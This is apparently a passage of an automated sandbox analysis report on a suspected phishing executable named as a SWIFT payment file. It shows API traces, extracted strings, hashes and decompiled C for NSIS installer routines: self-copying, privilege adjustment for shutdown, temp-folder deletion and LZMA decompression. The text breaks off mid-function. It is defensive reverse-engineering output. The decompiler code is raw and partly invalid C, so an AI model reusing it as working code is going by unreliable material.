CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe,00420F08,00000001), ref: 00403B21
CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
ExitProcess.KERNEL32(?), ref: 00403B6C
OleUninitialize.OLE32(?), ref: 00403B71
ExitProcess.KERNEL32 ref: 00403B8B
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
ExitProcess.KERNEL32 ref: 00403C1F

Strings

"C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe" , xrefs: 004037B6, 004037BC, 004037D1, 004039A8, 004039B4, 00403A02, 00403A0C
TMP, xrefs: 00403969
NSIS Error, xrefs: 004037A1
C:\Users\user\AppData\Local\Temp\, xrefs: 00403911, 00403916, 0040392C, 00403938, 00403947, 00403954, 00403960, 00403968, 00403A66, 00403A77, 00403A82, 00403A8E, 00403A9F, 00403AAE, 00403B64
SeShutdownPrivilege, xrefs: 00403BB4
\Temp, xrefs: 00403933
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403659
Error launching installer, xrefs: 00403A12
C:\Users\user\AppData\Local\Temp, xrefs: 00403A3B
1033, xrefs: 0040397D
C:\Users\user\AppData\Roaming, xrefs: 00403A88, 00403A8D, 00403AC0
C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe, xrefs: 00403B1C
.tmp, xrefs: 00403A7D
~nsu, xrefs: 00403A61
C:\Users\user\AppData\Local\Temp, xrefs: 00403901, 00403A30, 00403AB7, 00403AC1
UXTHEME, xrefs: 0040372E, 00403733, 00403739
Low, xrefs: 0040394F
TEMP, xrefs: 00403961

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
String ID: "C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 2292928366-3809075559
Opcode ID: 576690ede7b5918326371ee6a86c03391da91488ae6859ca98bd2718df8a95ef
Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
Opcode Fuzzy Hash: 576690ede7b5918326371ee6a86c03391da91488ae6859ca98bd2718df8a95ef
Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405D74 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E0040603F(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2e8 =  *0x42a2e8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406668(0x425750, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405F83(_t68);
					} else {
						lstrcatW(0x425750, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425750,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406668(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405D2C(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004056CA(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2e8 =  *0x42a2e8 + 1;
										} else {
											E004056CA(0xfffffff1, _t68);
											E00406428(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405D74(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70); // executed
						goto L26;
					}
					__eflags =  *0x425750 - 0x5c;
					if( *0x425750 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040699E(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405F37(_t68);
							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004056CA(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004056CA(0xfffffff1, _t68);
							return E00406428(_t67, _t68, 0);
						}
						L30:
						 *0x42a2e8 =  *0x42a2e8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x00405d7e
0x00405d83
0x00405d8c
0x00405d8f
0x00405d97
0x00405d9a
0x00405d9d
0x00405da5
0x00405da7
0x00405da8
0x00000000
0x00405da8
0x00405db3
0x00405db6
0x00405db6
0x00405db6
0x00405dba
0x00405dcd
0x00405dd4
0x00405dd9
0x00405ddd
0x00405ded
0x00405ddf
0x00405de5
0x00405de5
0x00405df2
0x00405df6
0x00405e02
0x00405e08
0x00405e0d
0x00405e13
0x00405e1e
0x00405e24
0x00405e26
0x00405e29
0x00405ed3
0x00405ed3
0x00405ed7
0x00405ed9
0x00405ed9
0x00405ed9
0x00405ed9
0x00000000
0x00000000
0x00000000
0x00000000
0x00405e2f
0x00405e2f
0x00405e2f
0x00405e37
0x00405e57
0x00405e5f
0x00405e64
0x00405e6b
0x00405e86
0x00405e8b
0x00405e8d
0x00405eb1
0x00405e8f
0x00405e8f
0x00405e92
0x00405ea6
0x00405e94
0x00405e97
0x00405e9f
0x00405e9f
0x00405e92
0x00405e6d
0x00405e73
0x00405e75
0x00405e7b
0x00405e7b
0x00405e75
0x00000000
0x00405e6b
0x00405e39
0x00405e41
0x00000000
0x00000000
0x00405e43
0x00405e4b
0x00000000
0x00000000
0x00405e4d
0x00405e55
0x00000000
0x00000000
0x00000000
0x00405eb6
0x00405ebe
0x00405ec4
0x00405ec4
0x00405ecd
0x00000000
0x00405ecd
0x00405df8
0x00405e00
0x00000000
0x00000000
0x00000000
0x00405dbc
0x00405dbc
0x00405dbe
0x00405ede
0x00405ee0
0x00405ee3
0x00405f34
0x00405f34
0x00405f34
0x00405ee5
0x00405ee8
0x00405ef3
0x00405ef8
0x00405efa
0x00000000
0x00000000
0x00405efd
0x00405f09
0x00405f0e
0x00405f10
0x00000000
0x00405f2b
0x00405f12
0x00405f15
0x00000000
0x00000000
0x00405f1a
0x00000000
0x00405f21
0x00405eea
0x00405eea
0x00000000
0x00405eea
0x00405dc4
0x00405dc7
0x00000000
0x00000000
0x00000000
0x00405dc7

APIs

DeleteFileW.KERNELBASE(?,?,746AFAA0,746AF560,00000000), ref: 00405D9D
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj2F71.tmp\*.*,\*.*), ref: 00405DE5
lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsj2F71.tmp\*.*,?,?,746AFAA0,746AF560,00000000), ref: 00405E0E
FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsj2F71.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsj2F71.tmp\*.*,?,?,746AFAA0,746AF560,00000000), ref: 00405E1E
FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
FindClose.KERNELBASE(00000000), ref: 00405ECD

Strings

., xrefs: 00405E43
C:\Users\user\AppData\Local\Temp\nsj2F71.tmp\*.*, xrefs: 00405DCD, 00405DD3, 00405DE4, 00405E1D
\*.*, xrefs: 00405DDF
., xrefs: 00405E2F

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: .$.$C:\Users\user\AppData\Local\Temp\nsj2F71.tmp\*.*$\*.*
API String ID: 2035342205-3049482134
Opcode ID: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
Opcode Fuzzy Hash: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE

Uniqueness

Uniqueness Score: -1.00%

Function 00406D5F Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00406D5F() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
